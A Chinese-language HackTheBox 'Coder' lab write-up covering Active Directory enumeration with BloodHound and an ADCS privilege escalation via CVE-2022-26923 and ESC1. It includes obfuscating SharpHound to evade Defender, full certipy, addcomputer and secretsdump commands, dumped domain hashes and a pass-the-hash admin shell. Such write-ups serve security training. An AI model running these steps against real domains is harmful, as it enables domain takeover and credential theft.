HackTheBox Coder [Bloodhound AD Enumeration + ADCS CVE-2022-26923]

Posted on Edited on In , Views: Word count in article: 4.3k Reading time ≈ 16 mins.

简述

本文是insane难度的HTB Coder机器的域渗透部分,其中Bloodhound AD Enumeration, ADCS CVE-2022-26923等域渗透提权细节是此box的特色,主要参考0xdf’s blog coder walkthroughHTB的coder官方writeup paper记录这篇博客加深记忆和理解,及供后续做深入研究查阅,备忘。

直接来到提权部分

通过列出e.black用户所属的组来开始枚举。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
*Evil-WinRM* PS C:\Users\e.black\Documents> whoami /groups

GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
CODER\PKI Admins                            Group            S-1-5-21-2608251805-3526430372-1546376444-2101 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

*Evil-WinRM* PS C:\Users\e.black\Documents> net group "PKI Admins"
Group name     PKI Admins
Comment        ADCS Certificate and Template Management

Members

-------------------------------------------------------------------------------
e.black
The command completed successfully.

列出了几个组,其中最值得注意的是PKI Admins,继续枚举它们。

该组织控制着Active Directory Certificate Services (ADCS) 证书,为潜在的ADCS滥用打开了大门。从这里开始,可以继续手动枚举系统,或者尝试使用混淆版本的SharpHound来做大部分的枚举。

bloodhound信息收集

通过之前渗透得到的账号密码信息继续使用bloodhound-python进行信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
~/hackthebox/machine/coder ⌚ 18:44:17
$ bloodhound-python -c All -u e.black -p ypOSJXPqlDOxxbQSfEERy300 -ns 10.10.11.207 -d coder.htb -dc coder.htb --zip
INFO: Found AD domain: coder.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: coder.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: coder.htb
INFO: Kerberos auth to LDAP failed, trying NTLM
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 10 users
INFO: Found 55 groups
INFO: Found 3 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.coder.htb
INFO: Done in 02M 23S
INFO: Compressing output into 20231220185002_bloodhound.zip

SharpHound v1.1.1

  • 注意这里SharpHound最新版2.3.0收集到的zip文件,最新版bloodhound 4.3.1解析不了,多次尝试发现只有SharpHound v1.1.1版本不会被杀软kill,而且可以正常收集zip文件,最新版bloodhound 4.3.1也能正常解析
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
*Evil-WinRM* PS C:\Users\e.black\Documents> wget 10.10.16.55/SharpHound.exe -o SharpHound.exe
*Evil-WinRM* PS C:\Users\e.black\Documents> ./SharpHound.exe -c ALL
2023-12-20T16:27:11.3045690-08:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2023-12-20T16:27:11.5155041-08:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-12-20T16:27:11.5436318-08:00|INFORMATION|Initializing SharpHound at 4:27 PM on 12/20/2023
2023-12-20T16:27:11.6842528-08:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for coder.htb : dc01.coder.htb
2023-12-20T16:27:11.9936243-08:00|INFORMATION|Loaded cache with stats: 286 ID to type mappings.
 287 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-12-20T16:27:12.0076864-08:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-12-20T16:27:12.1905057-08:00|INFORMATION|Beginning LDAP search for coder.htb
2023-12-20T16:27:12.2467555-08:00|INFORMATION|Producer has finished, closing LDAP channel
2023-12-20T16:27:12.2467555-08:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-12-20T16:27:39.4999666-08:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 38 MB RAM
2023-12-20T16:27:54.6311380-08:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2023-12-20T16:27:54.6733182-08:00|INFORMATION|Output channel closed, waiting for output task to complete
2023-12-20T16:27:54.7998809-08:00|INFORMATION|Status: 103 objects finished (+103 2.191489)/s -- Using 42 MB RAM
2023-12-20T16:27:54.7998809-08:00|INFORMATION|Enumeration finished in 00:00:47.3425399
2023-12-20T16:27:54.8983208-08:00|INFORMATION|Saving cache with stats: 286 ID to type mappings.
 287 name to SID mappings.
 1 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-12-20T16:27:54.9123809-08:00|INFORMATION|SharpHound Enumeration Completed at 4:27 PM on 12/20/2023! Happy Graphing!

或者使用混淆版本的SharpHound

使用InvisibilityCloak脚本对SharpHound源码进行混淆以绕过windows defender

1
python InvisibilityCloak.py -d /root/SharpHound -m reverse -n "ObfuscatedHound"

对混淆后的源码进行编译

1
2
dotnet restore .
dotnet build

尽管有一些错误和提示Build失败的消息,混淆可执行文件还是可以在SharpHound/bin/Debug/net462目录中找到。

1
2
cp SharpHound/bin/Debug/net462/ObfuscatedHound.exe .
python3 -m http.server 80

把zip上传到bloodhound gui。通常第一件事是将已经拿下的用户标记为owned。在本例中,是svc_teamcity、e.black,还有s.blade。

bloodhound分析攻击路径

  • e.black

e.black也没有出站控制,他们是另一个有趣的group PKI Admins的成员:

虽然这不是默认组,但它似乎可以控制PKI。该group的评论证实了这与ADCS有关:

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\e.black\Documents> net group "PKI Admins"
Group name     PKI Admins
Comment        ADCS Certificate and Template Management

Members

-------------------------------------------------------------------------------
e.black
The command completed successfully.
  • s.blade

s.blade也没有出站控制,但是两个组的成员,”Software Developers”和”Buildagent Mgmt”:

两个组都和TeamCity有关:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
*Evil-WinRM* PS C:\Users\e.black> net group "Buildagent Mgmt"
Group name     BuildAgent Mgmt
Comment        Teamcity BuildAgent Management

Members

-------------------------------------------------------------------------------
s.blade
The command completed successfully.
*Evil-WinRM* PS C:\Users\e.black> net group "Software Developers"
Group name     Software Developers
Comment        Teamcity CI/CD Development

Members

-------------------------------------------------------------------------------
j.briggs                 s.blade
The command completed successfully.

使用neo4j数据库语句查询它们之间的关系

1
MATCH p=(o:OU)-[r:Contains*0..]->(n) RETURN p

这对正在处理的Organizational Units(OU)有了一个坚实的概述,即:

1
OU=BUILDAGENTS,OU=DEVELOPMENT,DC=CODER,DC=HTB

最后,为了获得节点层次结构的完整概述,使用以下Cypher查询:

1
MATCH (o1)-[r1:Contains]->(o2:OU) WITH o1 MATCH p=(d)-[r2:Contains*0..]->(o1)-[r3:Contains]->(n) RETURN p

这里要查看的一件事是此AD中的organizational units (OU)。这可以用PowerShell完成:

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\e.black> Get-ADOrganizationalUnit -filter * | select Name

Name
----
Domain Controllers
Development
Groups
Users
BuildAgents

有了上述所有信息,现在可以枚举OU上的权限。来看BuildAgent mgmt组的访问控制列表(ACL)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
*Evil-WinRM* PS C:\Users\e.black\Documents> (Get-ACL "AD:$((Get-ADOrganizationalUnit -Identity 'OU=BuildAgents,OU=DEVELOPMENT,DC=CODER,DC=HTB').distinguishedname)").access | where IdentityReference -eq "CODER\BuildAgent mgmt"


ActiveDirectoryRights : CreateChild, DeleteChild
InheritanceType       : All
ObjectType            : bf967a86-0de6-11d0-a285-00aa003049e2
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : ObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : CODER\BuildAgent Mgmt
IsInherited           : False
InheritanceFlags      : ContainerInherit
PropagationFlags      : None

ActiveDirectoryRights : Self, ReadProperty, WriteProperty
InheritanceType       : Descendents
ObjectType            : 72e39547-7b18-11d1-adef-00c04fd8d5cd
InheritedObjectType   : bf967a86-0de6-11d0-a285-00aa003049e2
ObjectFlags           : ObjectAceTypePresent, InheritedObjectAceTypePresent
AccessControlType     : Allow
IdentityReference     : CODER\BuildAgent Mgmt
IsInherited           : False
InheritanceFlags      : ContainerInherit
PropagationFlags      : InheritOnly

可以看到两个条目指向两个不同的对象; 前者bf967a86-0de6-11d0-a285-00aa003049e2表示Computer对象,后者72e39547-7b18-11d1-adef-00c04fd8d5cd表示Validated-DNS-Host-Name

Exploit - Intended (CVE-2022-26923)

根据提供的信息,理解s.blade是BuildAgent Mgmt组的成员,具有在BuildAgents OU中创建和删除计算机对象的ACLs。此外,知道e.black有能力通过PKI Admins组的成员资格来管理ADCS证书模板。

通过组合这些权限,攻击者可以创建恶意证书模板,注册具有DNS名称dc01的计算机对象,并使用certipy提取NTLM hash。然而,应该注意的是,这个被称为”Certifried”的漏洞最近在2022年5月被修补了。然而,在研究了补丁的细节之后,有可能利用e.black的权限来修改带有自定义flags的模板,以绕过新的安全措施。

在此漏洞中,DNS host name属性(dNSHostName)不需要在域中是唯一的,因此,攻击者可以在完全控制的计算机上更改dNSHostName属性以匹配目标计算机(如DC),然后滥用ADCS以获得该DC的证书。这将使攻击者能够以DC的身份做一些事情,比如dump hash。

根据Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923),”在msPKI-Enrollment-Flag属性中设置了新的CT_FLAG_NO_SECURITY_EXTENSION (0x80000)的证书模板不会嵌入新的szOID_NTDS_CA_SECURITY_EXT OID,因此,这些模板仍然容易受到这种攻击。”

这意味着可以通过将CT_FLAG_NO_SECURITY_EXTENSION参数设置为524288(或十六进制中的0x8000)来制作恶意模板。为此,使用ADCSTemplate克隆一个模板,对其进行必要的调整。

  • 攻击策略

e.black对PKI/ADCS具有权限。使用它来导入一个带有CT_FLAG_NO_SECURITY_EXTENSION flag的新ADCS模板。

然后,作为s.blade,将向域中添加一台计算机,特别是添加到BuildAgents OU中,并将dNSHostName设置为DC01.coder.htb。

然后用恶意模板注册那台新机器。

然后,使用certipy为DC获取certificate,使用与新添加的计算机相关联的密码作为auth。

有了这个证书,就可以从DC dump hash。

1
2
*Evil-WinRM* PS C:\programdata> upload ADCSTemplate.psm1
*Evil-WinRM* PS C:\programdata> import-module .\ADCSTemplate.psm1

首先生成一个样板Active Directory证书模板,并将其保存在一个JSON文件中

1
*Evil-WinRM* PS C:\programdata> Export-ADCSTemplate -displayname Computer > out.json

接下来,将生成的JSON对象读入一个变量,并将前面提到的msPKI-Enrollment-Flag属性设置为524288。然后将JSON数据保存回out.json文件。

1
2
3
*Evil-WinRM* PS C:\programdata> $a = get-content out.json -raw | convertfrom-json
*Evil-WinRM* PS C:\programdata> $a.'msPKI-Enrollment-Flag' = 524288
*Evil-WinRM* PS C:\programdata> $a | convertto-json | set-content out.json

现在,可以使用New-ADCSTemplate基于JSON导出创建一个新的ADCS模板

1
*Evil-WinRM* PS C:\programdata> New-ADCSTemplate -displayname pwn -Publish -JSON (gc out.json -raw)

现在准备将访问控制列表设置为证书模板,但是首先,必须使用s.blade的权限创建恶意计算机对象。为此,使用Impacket的addcomputer.py,必须稍微修改一下,将DNS名称设置为dc01。

修改addcomputer.py脚本,如下所示:

1
2
3
4
5
6
7
8
ucd = {
    #'dnsHostName': '%s.%s' % (computerHostname, self.__domain),
    'dnsHostName': '%s.%s' % ("dc01", self.__domain),
    'userAccountControl': 0x1000,
    'servicePrincipalName': spns,
    'sAMAccountName': self.__computerName,
    'unicodePwd': ('"%s"' % self.__computerPassword).encode('utf-16-le')
}

注释掉了dnsHostName变量并直接对目标进行硬编码。现在,继续使用发现的s.blade凭据添加恶意计算机对象

1
2
3
4
5
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- python addcomputer.py 'coder.htb/s.blade:AmcwNO60Zg3vca3o0HDrTC6D' -method LDAPS -computer-name 'PWN_PC' -computer-pass 'MeloPwnMe' -computer-group OU=BuildAgents,OU=DEVELOPMENT,DC=CODER,DC=HTB
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation

[*] Successfully added machine account PWN_PC$ with password MeloPwnMe.

现在已经添加了新的PWN_PC$帐户,可以使用修改后的证书注册它。在目标机器上运行如下命令:

1
*Evil-WinRM* PS C:\programdata> Set-ADCSTemplateACL -displayname pwn -type allow -identity 'coder\pwn_pc$' -enroll

没有任何输出,表明命令运行成功。现在的最后一步是使用Certipy来请求和验证证书,使用之前设置的密码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- ntpdate dc01.coder.htb
2023-12-20 22:31:01.530099 (-0500) -1.041850 +/- 0.172013 dc01.coder.htb 10.10.11.207 s1 no-leap
CLOCK: time stepped by -1.041850
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- certipy req -u PWN_PC\$@dc01.coder.htb -p 'MeloPwnMe' -ca CODER-DC01-CA -template pwn -target dc01.coder.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 21
[*] Got certificate with DNS Host Name 'dc01.coder.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'dc01.pfx'

  • 注意: 如果在此阶段出现错误,则清理脚本可能已经擦除了创建的计算机对象。必须再次运行New-ADCSTemplate、addcomputer.py和Set-ADCSTemplateACL命令。

已经成功申请了dc01.coder.htb的证书,保存到dc01。

现在可以使用该文件对证书进行身份验证。

1
2
3
4
5
6
7
8
9
10
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- certipy auth -pfx dc01.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: dc01$@coder.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'dc01.ccache'
[*] Trying to retrieve NT hash for 'dc01$'
[*] Got hash for 'dc01$@coder.htb': aad3b435b51404eeaad3b435b51404ee:56dc040d21ac40b33206ce0c2f164f94

使用certipy的auth函数,通过Kerberos进行身份验证,并接收dc01的Ticket Granting Ticket (TGT)以及NT hash。

最后,可以使用NT hash和Impacket的secretsdump.py从域控制器中dump hash。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- secretsdump.py coder.htb/dc01\$@dc01.coder.htb -hashes :56dc040d21ac40b33206ce0c2f164f94 -dc-ip dc01.coder.htb
Impacket v0.9.25.dev1 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:807726fcf9f188adc26eeafd7dc16bb7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:26000ce1f6ca4029ec5d3a95631e797c:::
coder.htb\e.black:1106:aad3b435b51404eeaad3b435b51404ee:e1b96bbb66a073787a3310b5a956200d:::
coder.htb\c.cage:1107:aad3b435b51404eeaad3b435b51404ee:3ab6e9f70dbc0d19623be042d224b993:::
coder.htb\j.briggs:1108:aad3b435b51404eeaad3b435b51404ee:e38976c0b20e3e41e9c62da792115a33:::
coder.htb\l.kang:1109:aad3b435b51404eeaad3b435b51404ee:b8aba4878e4777864b292731ac88b4cd:::
coder.htb\s.blade:1110:aad3b435b51404eeaad3b435b51404ee:4e4a79beed7d042627d0a7b10f5d008a:::
coder.htb\svc_teamcity:5101:aad3b435b51404eeaad3b435b51404ee:4c5a6890e09834a6834dbf7a76bf20cb:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:56dc040d21ac40b33206ce0c2f164f94:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:86a6a038ff6058c56a74e2e35008f6b037b8e7bca8c75cc5ee4495f77d0be71e
Administrator:aes128-cts-hmac-sha1-96:6d63b0853502cbbc8c8e40ad8fe88fa3
Administrator:des-cbc-md5:37feabd9d9575785
krbtgt:aes256-cts-hmac-sha1-96:aeb517a1efec8b79479cb1432e734555bc1039bcbd77bcdc39234b37199a70d3
krbtgt:aes128-cts-hmac-sha1-96:2bab4af978e4cee0b58fa1d377d35981
krbtgt:des-cbc-md5:100489b5839798cb
coder.htb\e.black:aes256-cts-hmac-sha1-96:ccb6c47af9a05d91e7610fe396cd8ffcc0e51279a2eee253fab1fb40536a5a85
coder.htb\e.black:aes128-cts-hmac-sha1-96:650ad0d49ab4bcff325a7f2a846d433f
coder.htb\e.black:des-cbc-md5:89290da2c2cd16ec
coder.htb\c.cage:aes256-cts-hmac-sha1-96:ea9cc2144c3106e9325b1ddda16c27c644d9f9b7e95098581ceba19c75d9b296
coder.htb\c.cage:aes128-cts-hmac-sha1-96:2cff13848c9e8d07339a6ab41bf72088
coder.htb\c.cage:des-cbc-md5:fd6d578510df1af1
coder.htb\j.briggs:aes256-cts-hmac-sha1-96:ec3ac8b99094903a3ca006a725dc0867666347efb4baf04d8b2f8b0305ab65ee
coder.htb\j.briggs:aes128-cts-hmac-sha1-96:39050d78545c40645fa889c13200f8f7
coder.htb\j.briggs:des-cbc-md5:7f5286d35def8f15
coder.htb\l.kang:aes256-cts-hmac-sha1-96:d7eb03d2695638c4ba423cd88e22dcdd7c0f6da996e5d6ed3af6c6d7e6c56661
coder.htb\l.kang:aes128-cts-hmac-sha1-96:25ad8331aa0fa2b26e220040b9e55937
coder.htb\l.kang:des-cbc-md5:571a573e61ced640
coder.htb\s.blade:aes256-cts-hmac-sha1-96:ceeab374597121113f3bdee3aab1fed0522506909b2f1ec24dfe36045eb3c252
coder.htb\s.blade:aes128-cts-hmac-sha1-96:69f4cada02748fba948e4c15460add9e
coder.htb\s.blade:des-cbc-md5:26eca8ad9deaada2
coder.htb\svc_teamcity:aes256-cts-hmac-sha1-96:b6c7ed72b4434a89c56295df6b42ca68937702dda15f90f23423e8712abce030
coder.htb\svc_teamcity:aes128-cts-hmac-sha1-96:d6604e2fadb40bbf71708e7b9c9734a7
coder.htb\svc_teamcity:des-cbc-md5:264ab5645ed91c86
DC01$:aes256-cts-hmac-sha1-96:a43b686fdd5f2e576ad834c5b1d4327dd5bdbd3ec579677343a2c6c43c8f1740
DC01$:aes128-cts-hmac-sha1-96:22192237a3cb399c19a6b469dcd1cba8
DC01$:des-cbc-md5:cb9758c162ba4943
[*] Cleaning up...

Exploit - Shortcut

e.black有权创建ADCS模板。上面展示了上传一个错误配置的模板,导致CVE-2022-26923。可以上传任何脆弱的模板。

Certipy显示了上面修改的相同的”Computer”模板。将运行它来获取所有模板并将它们保存到一个文件:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- certipy find -u e.black -p ypOSJXPqlDOxxbQSfEERy300 -target coder.htb -text
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'coder-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'coder-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'coder-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'coder-DC01-CA'
[*] Saved text output to '20231220224850_Certipy.txt'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
33
   Template Name                       : User
   Display Name                        : User
   Certificate Authorities             : coder-DC01-CA
   Enabled                             : True
   Client Authentication               : True
   Enrollment Agent                    : False
   Any Purpose                         : False
   Enrollee Supplies Subject           : False
   Certificate Name Flag               : SubjectRequireDirectoryPath
                                         SubjectRequireEmail
                                         SubjectAltRequireEmail
                                         SubjectAltRequireUpn
   Enrollment Flag                     : AutoEnrollment
                                         PublishToDs
                                         IncludeSymmetricAlgorithms
   Private Key Flag                    : ExportableKey
   Extended Key Usage                  : Encrypting File System
                                         Secure Email
                                         Client Authentication
   Requires Manager Approval           : False
   Requires Key Archival               : False
   Authorized Signatures Required      : 0
   Validity Period                     : 1 year
   Renewal Period                      : 6 weeks
   Minimum RSA Key Length              : 2048
   Permissions
     Enrollment Permissions
       Enrollment Rights               : CODER.HTB\Domain Admins
                                         CODER.HTB\Domain Users
                                         CODER.HTB\Enterprise Admins
     Object Control Permissions
       Owner                           : CODER.HTB\Enterprise Admins
       Write Owner Principals          : CODER.HTB\Domain Admins
                                         CODER.HTB\Enterprise Admins
       Write Dacl Principals           : CODER.HTB\Domain Admins
                                         CODER.HTB\Enterprise Admins
       Write Property Principals       : CODER.HTB\Domain Admins
                                         CODER.HTB\Enterprise Admins

复制一个易受ESC1影响的。BlackHills有一篇很好的Abusing Active Directory Certificate Services – Part One,列出了ESC1所需的内容,包括以下图片:

与上面的”computer”模板相比,需要更改”Enrollee Supplies Subject”和”Certificate Name Flag”。如果在Certipy仓库中搜索该字符串,看到它们可能是相关的,并且ENROLLEE_SUPPLIES_SUBJECT值为1:

它与msPKI-Certificate-Name-Flag有关。像上面那样在PowerShell中获得一个模板作为对象:

1
2
*Evil-WinRM* PS C:\programdata> Export-ADCSTemplate -displayName Computer > computer.json
*Evil-WinRM* PS C:\programdata> $computer = cat computer.json -raw | ConvertFrom-Json

可以找到需要更改的属性的确切名称:

1
2
*Evil-WinRM* PS C:\programdata> $computer | get-member | findstr Name-Flag
msPKI-Certificate-Name-Flag   NoteProperty int msPKI-Certificate-Name-Flag=402653184

把它改成0x1

1
*Evil-WinRM* PS C:\programdata> $computer.'msPKI-Certificate-Name-Flag' = 0x1

现在将其输出到JSON中,然后创建模板,并注册e.black:

1
2
3
*Evil-WinRM* PS C:\programdata> $computer | ConvertTo-Json | Set-Content computer-mod-esc1.json
*Evil-WinRM* PS C:\programdata> New-ADCSTemplate -DisplayName "0xdf-ESC1" -Publish -JSON (cat computer-mod-esc1.json -raw)
*Evil-WinRM* PS C:\programdata> Set-ADCSTemplateACL -DisplayName "0xdf-ESC1" -type allow -identity 'coder\e.black' -enroll

如果扫描Coder与证书现在寻找易受攻击的模板(-vulnerable),这个新的模板:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- certipy find -u e.black -p ypOSJXPqlDOxxbQSfEERy300 -target coder.htb -text -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'coder-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'coder-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'coder-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'coder-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : coder-DC01-CA
    DNS Name                            : dc01.coder.htb
    Certificate Subject                 : CN=coder-DC01-CA, DC=coder, DC=htb
    Certificate Serial Number           : 2180F0D10CFECB9840260D0730724BDF
    Certificate Validity Start          : 2022-06-29 03:51:44+00:00
    Certificate Validity End            : 2052-06-29 04:01:44+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : CODER.HTB\Administrators
      Access Rights
        ManageCertificates              : CODER.HTB\Administrators
                                          CODER.HTB\Domain Admins
                                          CODER.HTB\Enterprise Admins
        ManageCa                        : CODER.HTB\Administrators
                                          CODER.HTB\Domain Admins
                                          CODER.HTB\Enterprise Admins
        Enroll                          : CODER.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : 0xdf-ESC1
    Display Name                        : 0xdf-ESC1
    Certificate Authorities             : coder-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : AutoEnrollment
    Private Key Flag                    : AttestNone
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CODER.HTB\Erron Black
      Object Control Permissions
        Owner                           : CODER.HTB\Erron Black
        Full Control Principals         : CODER.HTB\Domain Admins
                                          CODER.HTB\Local System
                                          CODER.HTB\Enterprise Admins
        Write Owner Principals          : CODER.HTB\Domain Admins
                                          CODER.HTB\Local System
                                          CODER.HTB\Enterprise Admins
        Write Dacl Principals           : CODER.HTB\Domain Admins
                                          CODER.HTB\Local System
                                          CODER.HTB\Enterprise Admins
        Write Property Principals       : CODER.HTB\Domain Admins
                                          CODER.HTB\Local System
                                          CODER.HTB\Enterprise Admins
    [!] Vulnerabilities
      ESC1                              : 'CODER.HTB\\Erron Black' can enroll, enrollee supplies subject and template allows client authentication
      ESC4                              : Template is owned by CODER.HTB\Erron Black

ESC1是配置的,ESC4是因为e.black拥有模板(因此可以滥用它)。

  • Exploit ESC1
1
2
3
4
5
6
7
8
9
10
11
12
13
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- ntpdate dc01.coder.htb
2023-12-20 23:14:02.635290 (-0500) -0.015002 +/- 0.157799 dc01.coder.htb 10.10.11.207 s1 no-leap
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- certipy req -u e.black -p ypOSJXPqlDOxxbQSfEERy300 -target coder.htb -ca coder-DC01-CA -template 0xdf-ESC1 -upn administrator@coder.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 25
[*] Got certificate with UPN 'administrator@coder.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

使用administrator.pfx dump administrator的NTLM hash

1
2
3
4
5
6
7
8
9
10
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- certipy auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@coder.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@coder.htb': aad3b435b51404eeaad3b435b51404ee:807726fcf9f188adc26eeafd7dc16bb7

WinRM administrator shell

1
2
3
4
5
6
7
8
9
10
-<ROOT@kali:~/hackthebox/machine/coder>-                                                                          -<pts/6>-
-<#>- evil-winrm -i dc01.coder.htb -u administrator -H 807726fcf9f188adc26eeafd7dc16bb7

Evil-WinRM shell v3.5

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
coder\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
9480de5c3cdffb5a4e42606911ff066e

Reference Sources

  • 0xdf’s blog Coder walkthrough
  • SharpHound v1.1.1
  • bloodhound 4.3.1
  • InvisibilityCloak
